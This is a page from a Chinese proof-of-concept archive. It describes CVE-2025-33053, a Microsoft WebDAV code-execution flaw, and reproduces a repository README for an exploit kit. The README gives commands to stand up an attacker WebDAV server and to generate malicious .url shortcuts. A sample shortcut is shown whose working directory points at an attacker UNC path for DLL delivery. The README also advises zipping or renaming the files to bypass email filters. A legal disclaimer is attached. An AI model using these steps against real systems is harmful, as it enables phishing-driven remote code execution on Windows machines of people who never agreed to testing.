关联漏洞
标题:
Microsoft WebDAV 安全漏洞
(CVE-2025-33053)
描述:Microsoft WebDAV是美国微软(Microsoft)公司的一种基于HTTP协议的扩展,用于通过互联网进行文件管理和协同编辑。 Microsoft WebDAV存在安全漏洞。攻击者利用该漏洞可以执行代码。以下产品和版本受到影响:Windows 11 Version 24H2 for ARM64-based Systems,Windows 11 Version 24H2 for x64-based Systems,Windows Server 2025,Windows 10 for 32-bit
描述
CVE-2025-33053 Proof Of Concept (PoC)
介绍
# CVE-2025-33053 Proof Of Concept
This repository provides scripts to **automatically deploy a WebDAV server on Ubuntu using Apache2**, and generate **malicious `.url` shortcut files** for use in phishing, red teaming, or lateral movement simulation.
---
## 📁 Contents
- `setup_webdav.sh` – Bash script to configure Apache2 + WebDAV.
- `setup_webdav.py` – Python version of the above.
- `gen_url.py` – Python script to generate `.url` shortcut files with UNC/WebDAV paths.
- `README.md` – Documentation.
---
## 🔧 Requirements
- OS: Ubuntu 20.04 or newer (Debian-compatible)
- Root privileges (`sudo`)
- Python 3.x
---
## 🚀 Setup Instructions
### 1. WebDAV Server (via Bash)
```bash
sudo bash setup_webdav.sh
```
Or using Python:
```bash
sudo python3 setup_webdav.py
```
By default, the script will:
- Install Apache and required WebDAV modules.
- Create a shared directory at `/var/www/webdav`.
- Enable `DAV` and `DAV_FS` modules.
- Create a `DavLockDB` directory (to prevent Apache DAV locking errors).
- Restart the Apache service.
> 📎 WebDAV path: `http://<your-ip>/webdav/`
---
## 💣 Generating a Malicious `.url` Shortcut
### Example usage:
```bash
python3 gen_url.py --ip 192.168.1.100 --out doc.url
```
### All Options:
```bash
python3 gen_url.py \
--ip 《YOUR IP ADDRESS》\
--share 《YOUR SHARE NAME》(Default: webdav) \
--out 《YOUR OUTPUT FILENAME.url》(Default: bait.url) \
--exe "C:\Program Files\Internet Explorer\iediagcmd.exe" \
--icon "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" \
--index 13 \
--modified 20F06BA06D07BD014D
```
This will create a `.url` file like:
```ini
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\192.168.1.100\webdav\
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D
```
> 📌 Clicking this file (in certain configurations) may cause the target system to auto-connect to your WebDAV server (authentication or DLL delivery).
---
## 🔒 Notes for Security Testing
- **Disable Firewall (or open port 80)** if testing on a local network:
```bash
sudo ufw allow 80
```
- `.url` files may not execute as expected depending on:
- Group Policy restrictions
- Application defaults
- Email client (Gmail may sanitize them)
- You may need to zip or rename `.url` to `.txt` to bypass filters.
---
## ⚠️ Legal Disclaimer
This repository is for **educational and authorized penetration testing only**.
**Do not use** these scripts against systems you do not own or have permission to test.
---
## 🧠 References
- [WebDAV Server Setup - LinuxConfig.org](https://linuxconfig.org/webdav-server-setup-on-ubuntu-linux)
- [WebDAV Apache Config - Peter Girnus](https://www.petergirnus.com/blog/setup-configure-a-webdav-server-ubuntu-linux-apache)
- [Microsoft WebDAV Docs](https://learn.microsoft.com/en-us/iis/publish/using-webdav/using-webdav-with-iis)
---
## 📬 Contact
For questions or ethical red teaming requests, reach out via GitHub issues.
文件快照
[4.0K] /data/pocs/979f544fa4e429c97dd2898466920a53ed14db6b
├── [ 0] cve_2025_33053.rb
├── [1.7K] gen_url.py
├── [ 11K] LICENSE
├── [3.0K] README.md
├── [2.2K] setup_webdav.py
└── [1.4K] setup_webdav.sh
0 directories, 6 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。